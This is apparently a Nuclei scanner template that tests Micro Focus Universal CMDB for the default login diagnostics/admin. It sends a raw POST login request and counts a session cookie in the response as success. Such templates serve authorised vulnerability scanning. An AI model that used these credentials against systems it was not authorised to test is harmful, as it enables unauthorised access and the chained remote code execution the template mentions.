id: ucmdb-default-login

info:
  name: Micro Focus Universal CMDB Default Login
  author: dwisiswant0
  severity: high
  description: Micro Focus Universal CMDB default login credentials were discovered for diagnostics/admin. Note there is potential for this to be chained together with other vulnerabilities as with CVE-2020-11853
    and CVE-2020-11854.
  reference:
    - https://packetstormsecurity.com/files/161182/Micro-Focus-UCMDB-Remote-Code-Execution.htm
  classification:
    cwe-id: CWE-798
  tags: ucmdb,default-login,packetstorm

requests:
  - raw:
      - |
        POST /ucmdb-ui/cms/loginRequest.do; HTTP/1.1
        Host: {{Hostname}}

        customerID=1&isEncoded=false&userName={{username}}&password={{base64(password)}}&ldapServerName=UCMDB

    attack: pitchfork
    payloads:
      username:
        - diagnostics
      password:
        - admin

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - "LWSSO_COOKIE_KEY"

# Enhanced by mp on 2022/03/07
